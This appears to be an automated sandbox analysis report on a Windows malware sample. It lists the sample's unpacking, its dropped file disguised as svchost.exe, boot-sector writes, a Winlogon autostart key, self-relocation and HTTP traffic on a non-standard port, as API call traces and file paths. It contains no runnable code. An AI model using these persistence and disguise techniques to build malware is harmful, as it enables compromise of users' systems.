Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 20.2.nPtwtzGyOdAtB.exe.1400000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\WlCVLbzNph.exeUnpacked PE file: 0.2.WlCVLbzNph.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: WlCVLbzNph.exeStatic PE information: real checksum: 0x51906146 should be: 0x40f06
Source: svchost.exe.0.drStatic PE information: real checksum: 0x310a7fed should be: 0x40f06
Source: WlCVLbzNph.exeStatic PE information: section name: .j
Source: WlCVLbzNph.exeStatic PE information: section name: .nkytZ
Source: WlCVLbzNph.exeStatic PE information: section name: .N
Source: WlCVLbzNph.exeStatic PE information: section name: .fc
Source: WlCVLbzNph.exeStatic PE information: section name: .s
Source: WlCVLbzNph.exeStatic PE information: section name: .w
Source: svchost.exe.0.drStatic PE information: section name: .j
Source: svchost.exe.0.drStatic PE information: section name: .nkytZ
Source: svchost.exe.0.drStatic PE information: section name: .N
Source: svchost.exe.0.drStatic PE information: section name: .fc
Source: svchost.exe.0.drStatic PE information: section name: .s
Source: svchost.exe.0.drStatic PE information: section name: .w
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004000C2 push esp; ret 0_2_004000C3
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0040008D push FB0DB0C3h; ret 0_2_004000B7
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044C903 push cs; ret 0_2_0044C918
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044C939 push cs; iretd 0_2_0044C948
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044C26D push es; iretd 0_2_0044C27C
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00448CA0 push eax; ret 0_2_00448CCE
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0210065B push ebx; ret 0_2_02100677
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0210065B push dword ptr [esp+48h]; ret 0_2_02100747
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_02100678 push dword ptr [esp+48h]; ret 0_2_02100747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004000C2 push esp; ret 2_2_004000C3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040008D push FB0DB0C3h; ret 2_2_004000B7
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C903 push cs; ret 2_2_0044C918
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C939 push cs; iretd 2_2_0044C948
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C26D push es; iretd 2_2_0044C27C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00448CA0 push eax; ret 2_2_00448CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B03 push cs; ret 2_2_02CB6B18
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACB03 push esi; retf 2_2_02CACB04
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B39 push cs; iretd 2_2_02CB6B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB28A0 push eax; ret 2_2_02CB28CE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE990 push esi; retf 2_2_02CAE994
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACEB1 push esi; retf 2_2_02CACEB5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE62D push esi; retf 2_2_02CAE631
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB646D push es; iretd 2_2_02CB647C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E726D push es; iretd 2_2_029E727C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D4392 push ebp; retf 2_2_029D4393
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D410C push ebp; retf 2_2_029D410D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E3CA0 push eax; ret 2_2_029E3CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B20678 push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push ebx; ret 2_2_02B20677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014528A0 push eax; ret 5_2_014528CE

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02C82030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_01422030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_01392030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u10_2_03222030
Drops PE files with benign system names
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\WlCVLbzNph.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403440
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02C82030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_01422030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_01392030
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u10_2_03222030
Creates an undocumented autostart registry key
Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Monitors registry run keys for changes
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Moves itself to temp directory
Source: c:\users\user\desktop\wlcvlbznph.exeFile moved: C:\Users\user\AppData\Local\Temp\5AFF.tmpJump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 53550
Source: unknownNetwork traffic detected: HTTP traffic on port 53553 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 53553
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02C7C380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C78F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02C78F20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02C7BDD0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_0141C380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_0141BDD0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01418F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_01418F20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0138C380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0138BDD0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01388F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_01388F20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138BE40
